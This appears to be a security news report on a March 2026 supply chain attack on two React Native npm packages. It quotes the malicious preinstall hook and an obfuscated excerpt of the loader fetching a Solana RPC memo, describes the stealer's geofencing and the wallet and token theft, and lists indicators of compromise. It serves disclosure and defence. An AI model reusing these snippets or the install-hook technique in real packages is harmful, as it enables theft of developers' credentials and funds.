Researchers found a coordinated supply chain attack on two popular React Native npm packages on March 16, 2026. The infected releases add an install-time loader that quietly downloads and runs a multi-stage Windows credential and cryptocurrency stealer. A routine npm install is all it takes to infect a developer's machine.
The Attack on the Supply Chain

The threat actor compromised packages published by AstrOOnauta and pushed malicious versions of both within minutes of each other. Clean updates were replaced with infected releases carrying the same malicious payload.

Package                                    Clean version   Malicious version   Monthly downloads
react-native-international-phone-number    0.11.7          0.11.8              ~92,000
react-native-country-select                0.3.9           0.3.91              ~42,000

According to Aikido, the malicious code is triggered by a new preinstall script added to each package's package.json.
npm runs this script automatically before the package itself is installed. Both malicious releases add the same package lifecycle hook:

"scripts": {
  "preinstall": "node install.js"
}

The heavily obfuscated loader first queries a Solana RPC (remote procedure call) endpoint to fetch a transaction memo. That memo conceals the URL of the second-stage payload.
The install.js shipped in the malicious releases shows the Solana RPC fetch directly:

let y = await fetch(S, {
  'method': e(0x45b, 'nSeb', 0x48f, 0x42b),
  'headers': M,
  'body': JSON[d(0x473, 'kjpv', 0x42d, 0x471)]({
    'jsonrpc': e(0x42c, ')qo^', 0x477, 0x425),
    'id': 0x1,
    'method': 'getSignatu' + e(0x441, 'PhAy', 0x42c, 0x45e) + d(0x4bb, '6bCJ', 0x4b3, 0x4d3),
    'params': [H[d(0x50d, '%Rah', 0x527, 0x4f7)](), t]
  })
});

Once downloaded, the second stage supplies the decryption keys needed to unpack the final, Windows-focused stealer.
In this final stage, the malware establishes persistence by modifying scheduled tasks and registry keys on the victim's machine. It retrieves its final instructions through a Google Calendar URL, an extra layer of indirection that helps obscure its command channel.

Tactics for Impact and Evasion

The malware inspects the victim's system environment, including language settings and time zone, to confirm that the victim is not located in Russia.
If it finds indicators such as the "ru_RU" locale or a Russian time zone, it exits silently. This kind of geographic filtering is a common practice among Russian-speaking criminal groups. If the system passes the location check, the payload searches the victim's application data for Chromium- and Firefox-based browser profiles.
It explicitly targets browser extensions for MetaMask, Phantom, Trust Wallet, and several other cryptocurrency wallets. It also runs system commands to steal GitHub credentials and authenticated npm registry tokens.

Indicator type            Value
Malicious hash (SHA-256)  59221aa9623d86c930357dba7e3f54138c7ccbd0daa9c483d766cd8ce1b6ad26
Malicious IPs             45.32.150.251, 217.69.3.152
Associated domains        socket.network, n.xyz, p.link

Anyone who uses these packages should audit their environments immediately.
The recommended remediation is to pin dependencies to the last known clean versions and rotate any credentials that may have been exposed.